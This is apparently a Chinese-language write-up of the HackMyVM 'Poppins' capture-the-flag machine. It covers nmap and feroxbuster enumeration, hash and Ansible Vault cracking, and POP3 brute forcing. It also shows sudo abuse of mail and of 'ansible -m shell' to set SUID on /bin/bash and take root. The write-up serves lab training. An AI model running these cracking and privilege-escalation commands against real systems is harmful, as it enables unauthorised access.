HMVM-Poppins

┌──(root㉿kali)-[~]
└─# arp-scan -I eth2 -l
Interface: eth2, type: EN10MB, MAC: 00:0c:29:26:ba:7d, IPv4: 192.168.56.121
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1    0a:00:27:00:00:17       (Unknown: locally administered)
192.168.56.100  08:00:27:31:fc:54       PCS Systemtechnik GmbH
192.168.56.127  08:00:27:e2:41:cd       PCS Systemtechnik GmbH

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.272 seconds (112.68 hosts/sec). 3 responded
                                                                                                                                                                     
┌──(root㉿kali)-[~]
└─# nmap -Pn -A -sV -T4 -p- 192.168.56.127
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-02-11 23:40 EST
Nmap scan report for 192.168.56.127
Host is up (0.011s latency).
Not shown: 65531 closed tcp ports (reset)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp  open  http     Apache httpd 2.4.62 ((Debian))
|_http-title: Mary Poppins - A Timeless Classic
|_http-server-header: Apache/2.4.62 (Debian)
110/tcp open  pop3     Dovecot pop3d
|_pop3-capabilities: RESP-CODES UIDL TOP AUTH-RESP-CODE PIPELINING SASL(PLAIN) CAPA STLS USER
| ssl-cert: Subject: commonName=Poppies
| Subject Alternative Name: DNS:Poppies
| Not valid before: 2025-08-29T16:42:33
|_Not valid after:  2035-08-27T16:42:33
|_ssl-date: TLS randomness does not represent time
995/tcp open  ssl/pop3 Dovecot pop3d
|_pop3-capabilities: RESP-CODES SASL(PLAIN) UIDL USER AUTH-RESP-CODE PIPELINING TOP CAPA
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=Poppies
| Subject Alternative Name: DNS:Poppies
| Not valid before: 2025-08-29T16:42:33
|_Not valid after:  2035-08-27T16:42:33
MAC Address: 08:00:27:E2:41:CD (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT      ADDRESS
1   11.01 ms 192.168.56.127

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.32 seconds
                                                                                                                                                                     
┌──(root㉿kali)-[~]
└─# feroxbuster -u http://192.168.56.127     
                                                                                                                                                                     
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.11.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://192.168.56.127
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.11.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET        9l       31w      276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403      GET        9l       28w      279c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301      GET        9l       28w      312c http://192.168.56.127/s => http://192.168.56.127/s/
200      GET      131l      472w     4703c http://192.168.56.127/
301      GET        9l       28w      314c http://192.168.56.127/s/u => http://192.168.56.127/s/u/
301      GET        9l       28w      316c http://192.168.56.127/s/u/p => http://192.168.56.127/s/u/p/
301      GET        9l       28w      318c http://192.168.56.127/s/u/p/e => http://192.168.56.127/s/u/p/e/
[####################] - 23s   120013/120013  0s      found:5       errors:39     
[####################] - 17s    30000/30000   1736/s  http://192.168.56.127/ 
[####################] - 19s    30000/30000   1611/s  http://192.168.56.127/s/ 
[####################] - 19s    30000/30000   1595/s  http://192.168.56.127/s/u/ 
[####################] - 18s    30000/30000   1654/s  http://192.168.56.127/s/u/p/                                                                                                                                                                                                                                                        
┌──(root㉿kali)-[~]
└─# 

这个目录看起来有点奇怪，看起来像是多个字符的拼接

构造一个字典继续爆破

┌──(root㉿kali)-[/tmp]
└─# printf "%s\n" {a..z} >> 1.txt
                                                                                                                                                                     
┌──(root㉿kali)-[/tmp]
└─# cat 1.txt                    
a
b
c
d
e
f
g
h
i
j
k
l
m
n
o
p
q
r
s
t
u
v
w
x
y
z
                                                                                                                                                                     
┌──(root㉿kali)-[/tmp]
└─# feroxbuster -u http://192.168.56.127 -w 1.txt
                                                                                                                                                                     
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.11.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://192.168.56.127
 🚀  Threads               │ 50
 📖  Wordlist              │ 1.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.11.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403      GET        9l       28w      279c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404      GET        9l       31w      276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET      131l      472w     4703c http://192.168.56.127/
301      GET        9l       28w      312c http://192.168.56.127/s => http://192.168.56.127/s/
301      GET        9l       28w      314c http://192.168.56.127/s/u => http://192.168.56.127/s/u/
301      GET        9l       28w      316c http://192.168.56.127/s/u/p => http://192.168.56.127/s/u/p/
301      GET        9l       28w      318c http://192.168.56.127/s/u/p/e => http://192.168.56.127/s/u/p/e/
[####################] - 5s       124/124     0s      found:5       errors:0      
[####################] - 5s        27/27      5/s     http://192.168.56.127/ 
[####################] - 0s        27/27      1421/s  http://192.168.56.127/s/ 
[####################] - 1s        27/27      27/s    http://192.168.56.127/s/u/ 
[####################] - 1s        27/27      27/s    http://192.168.56.127/s/u/p/                                                                                                                                                                                                                                                        
┌──(root㉿kali)-[/tmp]
└─# feroxbuster -u http://192.168.56.127 -w 1.txt --depth=99999 
                                                                                                                                                                     
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.11.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://192.168.56.127
 🚀  Threads               │ 50
 📖  Wordlist              │ 1.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.11.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 99999
 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET        9l       31w      276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403      GET        9l       28w      279c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET      131l      472w     4703c http://192.168.56.127/
301      GET        9l       28w      312c http://192.168.56.127/s => http://192.168.56.127/s/
301      GET        9l       28w      314c http://192.168.56.127/s/u => http://192.168.56.127/s/u/
301      GET        9l       28w      316c http://192.168.56.127/s/u/p => http://192.168.56.127/s/u/p/
301      GET        9l       28w      318c http://192.168.56.127/s/u/p/e => http://192.168.56.127/s/u/p/e/
301      GET        9l       28w      320c http://192.168.56.127/s/u/p/e/r => http://192.168.56.127/s/u/p/e/r/
301      GET        9l       28w      322c http://192.168.56.127/s/u/p/e/r/c => http://192.168.56.127/s/u/p/e/r/c/
301      GET        9l       28w      324c http://192.168.56.127/s/u/p/e/r/c/a => http://192.168.56.127/s/u/p/e/r/c/a/
301      GET        9l       28w      326c http://192.168.56.127/s/u/p/e/r/c/a/l => http://192.168.56.127/s/u/p/e/r/c/a/l/
301      GET        9l       28w      328c http://192.168.56.127/s/u/p/e/r/c/a/l/i => http://192.168.56.127/s/u/p/e/r/c/a/l/i/
301      GET        9l       28w      330c http://192.168.56.127/s/u/p/e/r/c/a/l/i/f => http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/
301      GET        9l       28w      332c http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r => http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/
301      GET        9l       28w      334c http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a => http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/
301      GET        9l       28w      336c http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g => http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/
301      GET        9l       28w      338c http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i => http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/
301      GET        9l       28w      342c http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i => http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/
301      GET        9l       28w      346c http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t => http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/
301      GET        9l       28w      350c http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c => http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/
301      GET        9l       28w      352c http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e => http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/
301      GET        9l       28w      354c http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x => http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/
301      GET        9l       28w      356c http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p => http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/
301      GET        9l       28w      358c http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i => http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/
301      GET        9l       28w      362c http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l => http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/
301      GET        9l       28w      364c http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i => http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/
301      GET        9l       28w      366c http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d => http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/
301      GET        9l       28w      368c http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o => http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/
301      GET        9l       28w      370c http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c => http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/
301      GET        9l       28w      372c http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i => http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/
301      GET        9l       28w      374c http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/o => http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/o/
301      GET        9l       28w      376c http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/o/u => http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/o/u/
301      GET        9l       28w      378c http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/o/u/s => http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/o/u/s/
301      GET        9l       28w      340c http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l => http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/
301      GET        9l       28w      344c http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s => http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/
301      GET        9l       28w      348c http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i => http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/
301      GET        9l       28w      360c http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a => http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/
[####################] - 9s      2135/2135    0s      found:35      errors:0      
[####################] - 3s        27/27      8/s     http://192.168.56.127/ 
[####################] - 3s        27/27      9/s     http://192.168.56.127/s/ 
[####################] - 0s        27/27      1421/s  http://192.168.56.127/s/u/ 
[####################] - 0s        27/27      1688/s  http://192.168.56.127/s/u/p/ 
[####################] - 1s        27/27      27/s    http://192.168.56.127/s/u/p/e/ 
[####################] - 0s        27/27      1227/s  http://192.168.56.127/s/u/p/e/r/ 
[####################] - 1s        27/27      27/s    http://192.168.56.127/s/u/p/e/r/c/ 
[####################] - 0s        27/27      1286/s  http://192.168.56.127/s/u/p/e/r/c/a/ 
[####################] - 0s        27/27      1227/s  http://192.168.56.127/s/u/p/e/r/c/a/l/ 
[####################] - 0s        27/27      1125/s  http://192.168.56.127/s/u/p/e/r/c/a/l/i/ 
[####################] - 0s        27/27      1227/s  http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/ 
[####################] - 0s        27/27      900/s   http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/ 
[####################] - 0s        27/27      1125/s  http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/ 
[####################] - 0s        27/27      600/s   http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/ 
[####################] - 1s        27/27      32/s    http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/ 
[####################] - 2s        27/27      15/s    http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/ 
[####################] - 3s        27/27      9/s     http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/ 
[####################] - 3s        27/27      9/s     http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/ 
[####################] - 3s        27/27      9/s     http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/ 
[####################] - 3s        27/27      10/s    http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/ 
[####################] - 3s        27/27      10/s    http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/ 
[####################] - 3s        27/27      10/s    http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/ 
[####################] - 4s        27/27      7/s     http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/ 
[####################] - 4s        27/27      7/s     http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/ 
[####################] - 5s        27/27      6/s     http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/ 
[####################] - 5s        27/27      5/s     http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/ 
[####################] - 0s        27/27      500/s   http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/ 
[####################] - 0s        27/27      529/s   http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/ 
[####################] - 0s        27/27      551/s   http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/ 
[####################] - 0s        27/27      509/s   http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/ 
[####################] - 0s        27/27      474/s   http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/ 
[####################] - 0s        27/27      600/s   http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/ 
[####################] - 0s        27/27      397/s   http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/o/ 
[####################] - 0s        27/27      466/s   http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/o/u/ 
[####################] - 0s        27/27      397/s   http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/o/u/s/                                                                                                                                                                                          
┌──(root㉿kali)-[/tmp]
└─# 

继续爆破

┌──(root㉿kali)-[/tmp]
└─# feroxbuster -u http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/o/u/s/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x 7z,bak,pem,001,php,zip,txt,html,htm --scan-dir-listings  -C 503,404 --depth=99999 
                                                                                                                                                                     
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.11.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/o/u/s/
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 💢  Status Code Filters   │ [503, 404]
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.11.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 📂  Scan Dir Listings     │ true
 💲  Extensions            │ [7z, bak, pem, 001, php, zip, txt, html, htm]
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 99999
 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403      GET        9l       28w      279c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404      GET        9l       31w      276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET       60l      141w     1531c http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/o/u/s/
200      GET       60l      141w     1531c http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/o/u/s/index.html
200      GET      100l      100w     3300c http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/o/u/s/hash.bak
[##>-----------------] - 43s   258923/2205460 6m      found:3       errors:0      
[##>-----------------] - 43s   258600/2205460 6067/s  http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/o/u/s/                     

找到个hash.bak

使用hashcat爆破

hashcat -m 0 -a 0 hash.bak rockyou.txt

放入字典

人物猜测就是主页的这些

测试后发现是小写

hydra爆破无果

手动测试发现必须得有用户名才校验密码

但是pop3可以正常爆破 得到用户名密码，但是这个用户名密码无法ssh登陆的

使用ansible2john将其转化为能识别的形式

┌──(root㉿kali)-[/tmp]
└─# ansible2john vault.txt > hash.txt

使用john爆破

┌──(root㉿kali)-[/tmp]
└─# john hash.txt --wordlist=/root/yiyi/rockyou.txt     
Using default input encoding: UTF-8
Loaded 1 password hash (ansible, Ansible Vault [PBKDF2-SHA256 HMAC-256 256/256 AVX2 8x])
Cost 1 (iteration count) is 10000 for all loaded hashes
Will run 12 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:39 0.41% (ETA: 03:06:32) 0g/s 1791p/s 1791c/s 1791C/s richard!..nick20
javiel           (vault.txt)     
1g 0:00:00:50 DONE (2026-02-12 00:27) 0.01989g/s 1768p/s 1768c/s 1768C/s kiss1..janele
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
                                                                                                                                                                     
┌──(root㉿kali)-[/tmp]
└─# john hash.txt --show                                   
vault.txt:javiel

1 password hash cracked, 0 left
                                                                                                                                                                     
┌──(root㉿kali)-[/tmp]
└─# 

前面手工测试过jane是存在的，那么直接尝试ssh

使用刚才解出的password可以再解出micheal的密码（测试后发现）

┌──(root㉿kali)-[/tmp]
└─# ansible-vault view vault.txt 
Vault password: 
cumibug

查了一下关于Ansible Vault的常规思路（自己第一次见）

先离线爆破 Vault password → 再用该 password 正常解密 Vault 文件

ansible2john vault.txt > hash.txt
john hash.txt --wordlist=/root/yiyi/rockyou.txt
john hash.txt --show
ansible-vault view vault.txt

对比两个用户的sudo权限发现michael可以以winifred的身份免密执行mail

版本过老导致这里的方法都不可行

此处学习HackMyVM-Poppins - Skyarrow’s blog的思路

发送一封空邮件

sudo -u winifred /usr/bin/mail -s "test" winifred</dev/null

以 winifred 身份读取邮件

sudo -u winifred /usr/bin/mail

横向提权获取winifred的shell

!/bin/bash

再次查看sudo权限

winifred@Poppins:/home/michael$ sudo -l
Matching Defaults entries for winifred on Poppins:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User winifred may run the following commands on Poppins:
    (ALL) NOPASSWD: /usr/bin/ansible *
winifred@Poppins:/home/michael$ 

Ansible 的设计初衷是远程 / 本地执行系统命令

关键模块之一

-m shell

本质等价于

/bin/sh -c "你的命令"

所以：

ansible 执行的 shell = root shell

给本机的shell加suid权限

winifred@Poppins:/home/michael$ sudo /usr/bin/ansible localhost -m shell -a 'sudo chmod u+s /bin/bash'
[WARNING]: No inventory was parsed, only implicit localhost is available
[WARNING]: Consider using 'become', 'become_method', and 'become_user' rather than running sudo
localhost | CHANGED | rc=0 >>

winifred@Poppins:/home/michael$ bash -p
bash-5.0# whoami
root
bash-5.0# 

bash 默认 会丢弃 SUID 权限，所以需要加p（preserve privileges）